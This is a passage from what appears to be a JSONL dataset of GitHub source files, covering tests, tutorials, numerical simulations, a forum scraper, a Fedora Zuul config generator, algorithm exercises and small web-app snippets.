test_data_importer._get_path(__file__, \"data/2023mibb_matches_quals.csv\"),\n )\n assert len(matches) == 60\n\n MatchHelper.add_match_times(event, matches)\n\n EDT_DELTA = datetime.timedelta(hours=-4)\n assert matches[0].time == datetime.datetime(2023, 6, 30, 9, 30) - EDT_DELTA\n assert matches[49].time == datetime.datetime(2023, 6, 30, 17, 51) - EDT_DELTA\n assert matches[50].time == datetime.datetime(2023, 7, 1, 9, 30) - EDT_DELTA\n assert matches[59].time == datetime.datetime(2023, 7, 1, 10, 51) - EDT_DELTA\n\n\ndef test_add_match_times_with_weekdays_early_end(test_data_importer):\n event = Event(\n id=\"2023mirr\",\n event_short=\"mirr\",\n event_type_enum=EventType.OFFSEASON,\n name=\"Rainbow Rumble\",\n start_date=datetime.datetime(2023, 7, 21, 0, 0),\n end_date=datetime.datetime(2023, 7, 23, 0, 0),\n year=2023,\n timezone_id=\"America/Detroit\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(__file__, \"data/2023mirr_matches_quals.csv\"),\n )\n assert len(matches) == 48\n\n MatchHelper.add_match_times(event, matches)\n\n EDT_DELTA = datetime.timedelta(hours=-4)\n assert matches[0].time == datetime.datetime(2023, 7, 22, 10, 30) - EDT_DELTA\n assert matches[47].time == datetime.datetime(2023, 7, 22, 18, 0) - EDT_DELTA\n\n\ndef test_cleanup_matches(ndb_stub, test_data_importer):\n event = Event(\n id=\"2013test\",\n event_short=\"test\",\n year=2013,\n event_type_enum=EventType.REGIONAL,\n )\n event.put()\n\n played = [\n {\"red\": {\"score\": 5}, \"blue\": {\"score\": 0}},\n {\"red\": {\"score\": 5}, \"blue\": {\"score\": 20}},\n {\"red\": {\"score\": 5}, \"blue\": {\"score\": 0}},\n ]\n unplayed = {\"red\": {\"score\": -1}, \"blue\": {\"score\": -1}}\n\n matches = [\n Match(\n id=f\"2013test_qf1m{i}\",\n comp_level=CompLevel.QF,\n set_number=1,\n match_number=i,\n event=ndb.Key(Event, \"2013test\"),\n alliances_json=json.dumps(played[i - 1] if i < 4 else unplayed),\n )\n for i in range(1, 6)\n ]\n\n cleaned_matches, keys_to_delete = MatchHelper.delete_invalid_matches(matches, event)\n assert [m.key_name for m in cleaned_matches] == [\n \"2013test_qf1m1\",\n \"2013test_qf1m2\",\n \"2013test_qf1m3\",\n ]\n assert [k.id() for k in keys_to_delete] == [\"2013test_qf1m4\", \"2013test_qf1m5\"]\n","repo_name":"Zach3292/the-blue-alliance","sub_path":"src/backend/common/helpers/tests/match_helper_test.py","file_name":"match_helper_test.py","file_ext":"py","file_size_in_byte":15016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"12442922303","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 14:24:10 2018\n\n@author: Administrator\n\"\"\"\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\nprint('-------------------\\n');\n'''1)获得数据集的个数'''\ntrain_nums = mnist.train.num_examples\nvalidation_nums = mnist.validation.num_examples\ntest_nums = mnist.test.num_examples\nprint('MNIST数据集的个数')\nprint(' >>>train_nums=%d' % train_nums,'\\n',\n '>>>validation_nums=%d'% validation_nums,'\\n',\n '>>>test_nums=%d' % test_nums,'\\n')","repo_name":"RonnySun/TensorFlow-Rasberry-pai","sub_path":"python-example/first-pro/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20864088355","text":"from matplotlib import pyplot as plt\nfrom numpy import 
sin, exp, pi\n\n\ndef solve_parabolic(start, border_left, border_right, source, ts, te):\n    \"\"\"\n    start -- initial condition\n    border_*(t) -- boundary conditions\n    source(x, t) -- source function\n    ts -- experiment start time\n    te -- experiment end time\n    \"\"\"\n    u = list(start)\n\n    # number of steps along the x axis\n    n = len(u) - 1\n    xi = 1.0 / n\n\n    # time step (from the Courant condition)\n    r = 0.45  # < 0.5\n    tau = r * xi ** 2\n\n    # a copy, will be needed during the computation\n    v = list(u)\n\n    # current time\n    t = ts\n\n    while t < te:\n        # recompute the interior values with the finite-difference scheme\n        for i in range(1, n):\n            v[i] = (1 - 2 * r) * u[i] +\\\n                r * (u[i-1] + u[i+1]) +\\\n                tau * source(i * xi, t)\n        # recompute the boundary values\n        a0, b0, c0 = border_left(t)\n        a1, b1, c1 = border_right(t)\n        v[0] = (c0 - v[1] * a0 / xi) / (b0 - a0 / xi)\n        v[n] = (c1 + v[n-1] * a1 / xi) / (b1 + a1 / xi)\n        # no time to explain\n        u, v = v, u\n        # advance the time\n        t += tau\n\n    return u\n\n# Consider the solution using the example of the temperature distribution in a rod.\n# Suppose a sufficiently thin rod has no heat losses through its lateral\n# surface. Its left end is in thermal contact with a thermostat, while the\n# right end is thermally insulated. A sufficiently small heat source sits in\n# the middle of the rod. The task is to determine the temperature\n# distribution in the rod\n\nn = 100\n\n# set the initial condition\nu = [0.0 for i in range(n + 1)]\n\n# boundary conditions\nlocked = lambda t: [0.0, 1.0, 0.0]  # contact with the thermostat\nfree = lambda t: [1.0, 0.0, 0.0]  # thermally insulated end\nsource = lambda x, t: 1 if abs(x-0.5) < 1.0 / n else 0  # \"point\" source in the middle\n\nX = [1.0 / n * i for i in range(n+1)]\n\n# profile of the function\nplt.plot(X, u)\n\ndt = 0.1\nfor i in range(7):\n    u = solve_parabolic(u, locked, free, source, i * dt, (i + 1) * dt)\n    plt.plot(X, u)\n\n# show me this\nplt.xlabel('distance')\nplt.ylabel('temperature')\nplt.title('The temperature distribution in the rod')\nplt.show()\n","repo_name":"Antoniii/lab4","sub_path":"parabolicus.py","file_name":"parabolicus.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"9839319817","text":"import time\n\nfrom forums.models import ForumGroup, Forum, Topic, User, Post\n\nfrom .home_page import HomePage\nfrom .recent_discussions import RecentDiscussionsPage\nfrom .discussion import DiscussionPage\n\n\ndef has_seen_post(site, topic, user_id, post_datetime):\n    # return whether we've already seen a post from the given user\n    # at the given time in the given topic\n    try:\n        user = site.users.get(source_reference=user_id)\n    except User.DoesNotExist:\n        # user is unknown, so we can't have seen this post before\n        return False\n\n    return bool(topic.posts.filter(\n        author=user, created_at=post_datetime\n    ))\n\n\ndef scrape(site, min_date=None, get_updates=False, verbose=True):\n    home_page = HomePage(site.origin_url)\n    forums_by_identifier = {}\n\n    for category_group in home_page.category_groups:\n        # find / create ForumGroup\n        forum_group, created = ForumGroup.objects.get_or_create(\n            site=site, source_reference=category_group.identifier,\n            defaults={'name': category_group.name}\n        )\n        if not created:\n            changed_fields = []\n            if forum_group.name != category_group.name:\n                changed_fields.append('name')\n                forum_group.name = category_group.name\n\n            if changed_fields:\n                forum_group.save(update_fields=changed_fields)\n\n        for category in category_group.categories:\n            # find / 
create Forum\n forum, created = Forum.objects.get_or_create(\n site=site, source_reference=category.identifier,\n defaults={\n 'forum_group': forum_group,\n 'name': category.name,\n 'description': category.description\n }\n )\n if not created:\n changed_fields = []\n if forum.forum_group != forum_group:\n changed_fields.append('forum_group')\n forum.forum_group = forum_group\n if forum.name != category.name:\n changed_fields.append('name')\n forum.name = category.name\n if forum.description != category.description:\n changed_fields.append('description')\n forum.description = category.description\n\n if changed_fields:\n forum.save(update_fields=changed_fields)\n\n forums_by_identifier[category.identifier] = forum\n\n discussions_to_fetch = []\n\n page_num = 1\n has_reached_min_date = False\n\n while not has_reached_min_date:\n if verbose:\n print(\"Scanning recent discussions, page %d\" % page_num)\n\n recent_discussions = RecentDiscussionsPage(\n site.origin_url, page_number=page_num\n )\n\n for discussion in recent_discussions.discussions:\n\n last_poster = discussion.last_poster\n if (min_date is not None and last_poster.datetime < min_date):\n # discussion is older than min_date\n if discussion.is_sticky:\n # move to next discussion\n continue\n else:\n # all subsequent discussions are older than min_date\n has_reached_min_date = True\n break\n\n # find / create Topic\n topic, created = Topic.objects.get_or_create(\n forum=forums_by_identifier[discussion.category_identifier],\n source_reference=discussion.id,\n defaults={'title': discussion.title}\n )\n\n if (\n get_updates and not created\n and has_seen_post(site, topic, last_poster.user_id, last_poster.datetime)\n ):\n if discussion.is_sticky:\n continue\n else:\n has_reached_min_date = True\n break\n\n # last post of discussion is within range and not already seen -\n # fetch the discussion\n discussions_to_fetch.append(\n (topic, discussion.slug, discussion.page_count)\n )\n\n if page_num >= recent_discussions.max_page_number:\n # we have reached the end of the listing\n has_reached_min_date = True\n\n time.sleep(5)\n page_num += 1\n\n # fetch discussions in reverse order, so that if an error occurs we will\n # have scanned all the discussions older than that one, and can resume by\n # re-running the task\n for topic, slug, page_count in reversed(discussions_to_fetch):\n has_reached_min_date = False\n\n posts_to_add = []\n\n for page_num in range(page_count, 0, -1):\n if verbose:\n print(\n \"Fetching topic: %s, page %d of %d\" % (\n topic.title, page_num, page_count\n )\n )\n\n discussion_page = DiscussionPage(\n site.origin_url, topic.source_reference, slug, page_number=page_num\n )\n\n for post in reversed(discussion_page.posts):\n if min_date is not None and post.datetime < min_date:\n has_reached_min_date = True\n break\n elif get_updates and has_seen_post(site, topic, post.author_id, post.datetime):\n has_reached_min_date = True\n break\n else:\n posts_to_add.append(post)\n\n time.sleep(5)\n\n if has_reached_min_date:\n break\n\n for source_post in reversed(posts_to_add):\n # find / create User\n user, created = User.objects.get_or_create(\n site=site, source_reference=source_post.author_id,\n defaults={'username': source_post.author_username}\n )\n if not created and source_post.author_username != user.username:\n user.username = source_post.author_username\n user.save(update_fields=['username'])\n\n # find / create Post\n post, created = Post.objects.get_or_create(\n topic=topic, source_reference=source_post.id,\n 
defaults={\n 'author': user, 'created_at': source_post.datetime,\n 'body': source_post.body\n }\n )\n","repo_name":"gasman/euphorium","sub_path":"vanilla_scraper/scraper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12577637684","text":"# 블랙잭\n\n# 3장을 고른다 -\n\nn = 5\nm = 21\ncards = [5, 6, 7, 8, 9]\n\nn, m = map(int, input().split())\ncards = list(map(int, input().split()))\nresult = 0\n\nfor i in range(n):\n for j in range(i+1, n):\n for k in range(j+1, n):\n if cards[i] + cards[j] + cards[k] > m:\n continue\n else:\n result = max(result, cards[i] + cards[j] + cards[k])\n\n\n\nprint(result)\n\n\n# 다른 풀이\n\nfrom itertools import combinations\n\ncard_num, target_num = map(int, input().split())\ncard_list = list(map(int, input().split()))\nbiggest_sum = 0\n\nfor cards in combinations(card_list, 3):\n temp_sum = sum(cards)\n if biggest_sum < temp_sum <= target_num:\n biggest_sum = temp_sum\n\nprint(biggest_sum)\n\n\n","repo_name":"haremeat/Algorithm","sub_path":"boj/2798.py","file_name":"2798.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38259218330","text":"import cv2\nimport os\n\nif __name__ == '__main__':\n\n basePath = \"/Users/lxy/Desktop/FYP/videos/frameExtraction/\"\n directory = os.fsencode(basePath)\n\n for file in os.listdir(directory):\n fileName = os.fsdecode(file)\n fileName = fileName.replace(\"\\n\", \"\")\n # print(basePath + fileName)\n # print(pathway)\n cap = cv2.VideoCapture(basePath + fileName)\n c = 1\n frameRate = 100 # Interval between frames\n \n while (True):\n ret, frame = cap.read()\n if ret:\n if c % frameRate == 0:\n print(\"Start video capturing \" + str(c) + \" frame\")\n cv2.imwrite(\"/Users/lxy/Desktop/FYP/videos/frameExtraction/\" + fileName + str(c) + \".jpg\", frame)\n c += 1\n\n else:\n print(\"All frames saved\")\n break\n cap.release()\n","repo_name":"XunyiLu/FYP_understand_video_advertisement","sub_path":"frame_Extraction.py","file_name":"frame_Extraction.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16405429495","text":"from django import forms\nfrom .models import AAPerson\n\nclass PersonSearchForm(forms.Form):\n q = forms.CharField(max_length=100, required=False)\n page = forms.IntegerField(required=False)\n\n # get evidence type list directly from the database\n freedStatus = forms.MultipleChoiceField(\n choices = AAPerson.FREED_STATUS,\n widget = forms.CheckboxSelectMultiple,\n required=False,\n )\n\n # order by\n # sortOrder = forms.CharField(max_length=24, required=False)\n SORT_CHOICES = (('name','name'), \n ('last_name','last name'), \n ('birth_year','birth'), \n ('death_year','death'),\n ('first_appearance_year','first rec'),\n ('last_appearance_year','last rec'),\n )\n sortOrder = forms.ChoiceField(\n choices = SORT_CHOICES,\n widget = forms.Select,\n required=False,\n )\n","repo_name":"DigitalGizmo/aane_project","sub_path":"aane/people/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8041312966","text":"import argparse\nimport asyncio\n\nimport aiohttp\nimport yaml\n\n\nclass CustomDumper(yaml.Dumper):\n \"\"\"Dump the yaml in format that follows the 
current fedora-distgits.yaml\n\n Default yaml.dump() generates this:\n\n source-repositories:\n - rpms/3dprinter-udev-rules:\n default-branch: main\n zuul/include: []\n\n We want this:\n\n source-repositories:\n - rpms/3dprinter-udev-rules:\n default-branch: main\n zuul/include: []\n \"\"\"\n def increase_indent(self, flow=False, indentless=False):\n return super().increase_indent(flow, False)\n\n\nasync def find_packages_by_maintainers(queried_maintainers):\n async with aiohttp.ClientSession() as session:\n async with session.get(\n 'https://src.fedoraproject.org/extras/pagure_bz.json'\n ) as response:\n all_maintainers = await response.json()\n\n return {\n pkgname\n for pkgname, maintainers in all_maintainers[\"rpms\"].items()\n for maintainer in maintainers\n if maintainer in queried_maintainers\n }\n\n\nasync def return_if_retired(pkg, semaphore, sleep=1):\n url = f'https://src.fedoraproject.org/rpms/{pkg}/blob/rawhide/f/dead.package'\n async with semaphore, aiohttp.ClientSession() as session:\n try:\n async with session.head(url) as resp:\n if resp.status == 404:\n return\n elif resp.status == 200:\n return pkg\n elif resp.status >= 400:\n raise aiohttp.client_exceptions.ServerConnectionError()\n except (aiohttp.client_exceptions.ClientError, asyncio.TimeoutError):\n if sleep > 15 * 60:\n raise\n await asyncio.sleep(sleep)\n return await return_if_retired(pkg, semaphore, sleep*2)\n\n\nasync def get_active_packages(maintainers):\n packages_by_maintainers = await find_packages_by_maintainers(maintainers)\n \n # Check which of the above set are retired\n tasks = []\n semaphore = asyncio.Semaphore(512)\n for pkg in packages_by_maintainers:\n tasks.append(asyncio.create_task(return_if_retired(pkg, semaphore)))\n done = await asyncio.gather(*tasks)\n retired_pkgs = {pkg for pkg in done if pkg}\n \n # Filter only the non-retired package from our list\n return packages_by_maintainers - retired_pkgs\n\n\nasync def get_zuul_config():\n async with aiohttp.ClientSession() as session:\n async with session.get('https://pagure.io/fedora-project-config/raw/master/f/resources/fedora-distgits.yaml') as response:\n config = await response.text()\n return yaml.safe_load(config)\n\n\ndef list_packages_in_zuul(zuul_config):\n all_entries = zuul_config['resources']['projects']['Fedora-Distgits']['source-repositories']\n\n zuul_pkgnames = set()\n for entry in all_entries:\n for key in entry:\n # hack for `rpms/systemd` is not a dictionary, so it gets parsed by letters\n if len(key) == 1:\n key = entry\n # key is in format `rpms/pkg` or `tests/pkg`\n # we don't strip the prefixes because we'd lost the information down the line\n zuul_pkgnames.add(key)\n return zuul_pkgnames\n\n\ndef create_common_package_set(packages_by_maintainers, all_zuul_pkgs):\n # assume the newly added packages are `rpms/`\n packages_by_maintainers = {'rpms/' + pkg for pkg in packages_by_maintainers}\n common_package_set = packages_by_maintainers | all_zuul_pkgs\n if common_package_set == all_zuul_pkgs:\n # no new packages to add\n return False\n return common_package_set\n\n\ndef create_new_zuul_config(zuul_config, common_package_set):\n new_zuul_pkgs = []\n common_package_list = sorted(common_package_set)\n for pkg in common_package_list:\n # hack: systemd is not a dictionary, hence different handling\n if pkg == 'rpms/systemd':\n new_zuul_pkgs.append(pkg)\n else:\n new_zuul_pkgs.append({pkg: {'zuul/include': [], 'default-branch': 'main'}})\n\n zuul_config['resources']['projects']['Fedora-Distgits']['source-repositories'] = 
new_zuul_pkgs\n\n with open('fedora-distgits.yaml', 'w') as new_config_file:\n new_config_file.write(\n yaml.dump(\n zuul_config, Dumper=CustomDumper, default_flow_style=False, indent=2\n )\n )\n\nasync def generate_zuul_config(packages_by_owners):\n zuul_config = await get_zuul_config()\n all_pkgs_in_zuul = list_packages_in_zuul(zuul_config)\n common_pkg_set = create_common_package_set(packages_by_owners, all_pkgs_in_zuul)\n if common_pkg_set:\n create_new_zuul_config(zuul_config, common_pkg_set)\n else:\n print(\"No new packages to add - no config generated\")\n\n\nasync def main(maintainers):\n active_packages_by_owners = await get_active_packages(maintainers)\n await generate_zuul_config(active_packages_by_owners)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Provide a comma-separated list of FAS maintainers/groups to bulk add to zuul.'\n )\n parser.add_argument('maintainers', type=str, nargs='+',\n help='a comma-separated list of FAS maintainers')\n\n args = parser.parse_args()\n maintainers = [maintainer.strip() for maintainer in args.maintainers[0].split(',')]\n\n asyncio.run(main(maintainers))\n","repo_name":"befeleme/zuul-config-generator","sub_path":"generate_new_zuul_config.py","file_name":"generate_new_zuul_config.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13623092735","text":"# __Background:__ explore some path properties of the simple symmetric random walk.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import arcsine\n\n# ## Problem 1\ndef randomWalk(lengthOfRandomWalk):\n samplePath=np.zeros(lengthOfRandomWalk+1)\n randomWalk=np.random.choice([-1,1], lengthOfRandomWalk)\n \n for i in range(lengthOfRandomWalk):\n samplePath[i+1]=samplePath[i]+randomWalk[i]\n return samplePath\n\n## TEST YOUR FUNCTION HERE\nprint(randomWalk(50))\n# 2. 
Plot the trajectory of the random walk you simulated in 1.)\nplt.figure(figsize=(10,5))\nplt.plot(randomWalk(50))\nplt.xlabel(\"rounds\")\nplt.ylabel(\"capital\")\nplt.title(\"trajectory of the random walk\")\nplt.show()\n\n#Problem 2\ndef TimeOfLastVisitOfZero(path):\n result=np.where(path==0)\n lastVisit=np.max(result)\n \n return lastVisit \n\n## TEST YOUR FUNCTION HERE\npath = randomWalk(20)\nprint(path)\nTimeOfLastVisitOfZero(path)\n\n## A PLOT OF THE ARCSINE DENSITY\nx = np.linspace(arcsine.ppf(0.05), arcsine.ppf(0.95), 100)\nplt.title(\"Density of the arcsine distribution\")\nplt.plot(x, arcsine.pdf(x), linewidth=2, color='b')\nplt.show()\n\n# COMPLETE/MODIFY THE PLOT COMMANDS ACCORDINGLY\nN = 250\nM = 10000\n\ndef sampleLastVisit(N,M):\n LastVisit=np.zeros(M)\n for i in range(M):\n LastVisit[i]=TimeOfLastVisitOfZero(randomWalk(2*N))\n return LastVisit\n \nc= sampleLastVisit(N,M)\n# This has to be replaced by the simulated values for L_2N !!!\n\nplt.figure(figsize=(10,5))\nplt.title(\"Normalized histogram for 10000 realisations of $L_{500}$\")\nplt.hist(c, bins='auto', density='True')\nplt.show()\n\n# Problem3\ndef timeHitMax(randomWalk):\n \n result=np.argmax(randomWalk)\n\n return result \n\n## TEST YOUR FUNCTION HERE\npath = randomWalk(20)\nprint(path)\ntimeHitMax(path)\n\n# COMPLETE/MODIFY THE PLOT COMMANDS ACCORDINGLY\nN = 250\nM = 10000\n\ndef sampleMaxTime(N,M):\n maxTime=np.zeros(M)\n for i in range(M):\n maxTime[i]=timeHitMax(randomWalk(2*N))\n return maxTime\n \nc= sampleMaxTime(N,M)\n# This has to be replaced by the simulated values for M_2N !!!\n\nplt.figure(figsize=(10,5))\nplt.title(\"Normalized histogram for 10000 realisations of $M_{500}$\")\nplt.hist(c, bins='auto', density='True')\nplt.show()\n","repo_name":"wab1babu/Portfolio","sub_path":"Python/Stochastic Process/Project3.py","file_name":"Project3.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7080967008","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.chrome.service import Service\r\n\r\n\r\ndef pytest_addoption(parser):\r\n parser.addoption('--language', action='store', default=\"en\",\r\n help=\"Choose site language\")\r\n\r\n\r\n@pytest.fixture(scope=\"function\")\r\ndef browser(request):\r\n user_language = request.config.getoption(\"language\")\r\n print(\"\\nstart browser for test..\")\r\n\r\n options = Options()\r\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\r\n\r\n # Общий вариант запуска\r\n browser = webdriver.Chrome(options=options)\r\n\r\n # Запуск для моего компа\r\n # chrome_service_executable_path = \"C:\\\\Users\\\\thatsme\\\\AppData\\\\Local\\\\Programs\\\\ChromeDriver\\\\chromedriver.exe\"\r\n # chrome_service = Service(executable_path=chrome_service_executable_path)\r\n # browser = webdriver.Chrome(options=options, service=chrome_service)\r\n\r\n yield browser\r\n print(\"\\nquit browser..\")\r\n browser.quit()\r\n","repo_name":"xsmit/Stepik_Selenium_final_exercise","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18491357714","text":"from queue import SimpleQueue as Q\nfrom typing import List, Tuple\nimport heapq\nfrom algo_utils import PriorityQueue\n\n# this implementation works but the real algorithm 
uses a priority queue\n# why is a priority queue better in this algorithm?\n\n\ndef min_spanning_tree(\n graph: List[List[(Tuple[int, int])]], n:int\n) -> List[List[Tuple[int, int]]]:\n node = 0\n visited = set()\n q = PriorityQueue()\n raw_tree = []\n cost = 0\n seen_with = [float(\"inf\") for _ in range(n)]\n while len(raw_tree) < n:\n edges = get_edges(node, graph)\n for edge in edges:\n if edge[1] not in visited:\n q.insert(edge[-1], edge[:2])\n visited.add(node)\n if q.empty():\n break\n w, (par, node) = q.pull()\n while node in visited and not q.empty():\n w, (par, node) = q.pull()\n if seen_with[node] > w:\n raw_tree.append((par, node, w))\n seen_with[node] = w\n cost = sum(a[-1] for a in raw_tree)\n tree_center, tree = find_tree_center(raw_tree, n)\n tree = root_tree(tree, tree_center)\n return tree, cost\n\ndef get_edges(node, edges):\n start = 0\n end = len(edges)\n res = []\n while start < end:\n mid = (start + end)//2\n val = edges[mid][0]\n if val < node:\n start = mid + 1\n elif val > node:\n end = mid - 1\n else:\n res.append(edges[mid])\n a = mid - 1\n b = mid + 1\n while (a > -1 or b < len(edges)) :\n if a > -1 and edges[a][0] == node:\n res.append(edges[a])\n if b < len(edges) and edges[b][0] ==node:\n res.append(edges[b])\n a -= 1\n b += 1\n \n return res\n\n\ndef root_tree(\n tree: List[List[Tuple[int, int]]], node: int\n) -> List[List[Tuple[int, int]]]:\n visited = [False for _ in tree]\n res = [[] for _ in tree]\n q = Q()\n q.put(node)\n visited[node] = True\n while not q.empty():\n node = q.get()\n children = tree[node]\n for child, weight in children:\n if not visited[child]:\n visited[child] = True\n q.put(child)\n res[node].append((child, weight))\n\n return res\n\n\n\ndef edges_to_adj_list(edges, n):\n out = [[] for _ in range(n)]\n for f,t,w in edges:\n out[f].append((t,w))\n out[t].append((f,w))\n return out\n\n\n\ndef find_tree_center(tree, n) -> int:\n tree = edges_to_adj_list(tree, n)\n degs = [0 for _ in tree]\n leaves = []\n for node, children in enumerate(tree):\n degs[node] = len(children)\n if degs[node] <= 1:\n leaves.append(node)\n processed = len(leaves)\n while processed < len(tree):\n new_leaves = []\n for node in leaves:\n degs[node] = 0\n for k, weight in tree[node]:\n degs[k] -= 1\n if degs[k] <= 1:\n new_leaves.append(k)\n leaves = new_leaves\n processed += len(leaves)\n return leaves[0], tree\n\n\nif __name__ == \"__main__\":\n\n edges = [\n (0, 1, 10),\n (0, 2, 1),\n (0, 3, 4),\n (1, 0, 10),\n (1, 2, 3),\n (1, 4, 0),\n (2, 0, 1),\n (2, 1, 3),\n (2, 3, 2),\n (2, 5, 8),\n (3, 0, 4),\n (3, 2, 2),\n (3, 5, 2),\n (3, 6, 7),\n (4, 1, 0),\n (4, 5, 1),\n (4, 7, 8),\n (5, 4, 1),\n (5, 2, 8),\n (5, 7, 9),\n (5, 6, 6),\n (5, 3, 2),\n (6, 3, 7),\n (6, 5, 6),\n (6, 7, 12),\n (7, 4, 8),\n (7, 5, 9),\n (7, 6, 12),\n ]\n print(min_spanning_tree(edges, 8))\n","repo_name":"aminuolawale/algo_prep","sub_path":"graph_theory/12.0.min_spanning_tree.py","file_name":"12.0.min_spanning_tree.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37402695430","text":"import librosa.sequence\nimport numpy as np\n\n\n# calculate multidimensional dtw distance(suppose independent)\n# parameter ; np.array (output of function 'extract_features' in lpc.py)\n# return ; dtw distance of each order, np.array\ndef calculate_dtw_distance(file1_co, file2_co):\n input_dtw_distance = np.zeros(file1_co.shape[1])\n for i in range(file1_co.shape[1]):\n # align feature sequence with dtw\n 
input_dtw, input_wp = librosa.sequence.dtw(file1_co[:, i], file2_co[:, i])\n\n        # calculate distance\n        input_path = np.zeros(len(input_wp[:, 0]))\n        for j in range(len(input_wp[:, 0])):\n            input_path[j] = input_dtw[input_wp[j, 0], input_wp[j, 1]]\n\n        # store result of this order\n        input_dtw_distance[i] = (input_path.sum() / len(input_path))\n\n    return input_dtw_distance\n","repo_name":"veryneuron/genderrecognition","sub_path":"dtw.py","file_name":"dtw.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"7844846214","text":"from collections.abc import MutableMapping\n'''\nUntil Python 3.5 the dict returns keys and values in arbitrary order -\nnot the order in which the dict was filled.\n\n'''\npets_names = {\n    'cat': 'Ksy Ksy',\n    'dog': 'JSON'\n}\n\nprint(pets_names)\n\n'''\nDisplay keys of object\n'''\n\n\nclass MyClass:\n    def __init__(self):\n        self.dog = 'JSON'\n        self.cat = 'Ksy Ksy'\n\n\npets = MyClass()\nfor key, value in pets.__dict__.items():\n    print(f\"{key} = {value}\")\n\n\n'''\nWorking with objects which look like dicts\ne.g. module collections.abc\n'''\n\nvotes = {\n    'pet1': 1281,\n    'pet2': 587,\n    'pet3': 863\n}\n\n\ndef populate_ranks(votes, ranks):\n    names = list(votes.keys())\n    names.sort(key=votes.get, reverse=True)\n    for i, name in enumerate(names, 1):\n        ranks[name] = i\n\n\ndef get_winner(ranks):\n    return next(iter(ranks))\n\n\nranks = {}\n\npopulate_ranks(votes, ranks)\nprint(ranks)\n\nwinner = get_winner(ranks)\nprint(winner)\n\n'''\nCustom class to implement object with behaviour like dict\n'''\nclass SortedDict(MutableMapping):\n    def __init__(self):\n        self.data = {}\n\n    def __getitem__(self, key):\n        return self.data[key]\n\n    def __setitem__(self, key, value):\n        self.data[key] = value\n\n    def __delitem__(self, key):\n        del self.data[key]\n\n    def __iter__(self):\n        keys = list(self.data.keys())\n        keys.sort()\n        for key in keys:\n            yield key\n\n    def __len__(self):\n        return len(self.data)\n\n\nsorted_ranks = SortedDict()\n\npopulate_ranks(votes, sorted_ranks)\nprint(sorted_ranks.data)\n\nwinner = get_winner(sorted_ranks)\nprint(winner)\n\n'''\n- Don't write code that relies on the insertion order of dict values\n- Add type hinting to dicts\n- Check whether these parameters are real dicts and not just similar classes\n'''\n#78","repo_name":"MarcinGladkowski/python","sub_path":"dict/dict_ordering.py","file_name":"dict_ordering.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4980410475","text":"from __future__ import absolute_import\n\nfrom flask import abort, Blueprint, current_app, flash, jsonify, \\\n    render_template, request, redirect, url_for, make_response\nfrom flask_breadcrumbs import register_breadcrumb\nfrom flask_menu import register_menu\n\nfrom invenio.base.i18n import _\nfrom invenio.base.globals import cfg\nfrom invenio.ext.sslify import ssl_required\nfrom invenio.base.decorators import wash_arguments\nfrom invenio.ext.sqlalchemy import db\nfrom invenio.modules.formatter import format_record\n\nfrom lw_daap.ext.login import login_required\nfrom .service_utils import createInstrument, getFilteredInstrumentsByIdUser, addPermissionGroup, findInstrumentByName, \\\n    getPaginatedInstrumentsByIdUser, getCountInstrumentsByIdUser, getDBPublicUser, getDBPublicPass, getDBUrl\n\nfrom lw_daap.modules.profile.service_utils import getUserInfoByPortalUser\nfrom lw_daap.modules.profile.models import UserProfile\n\nfrom 
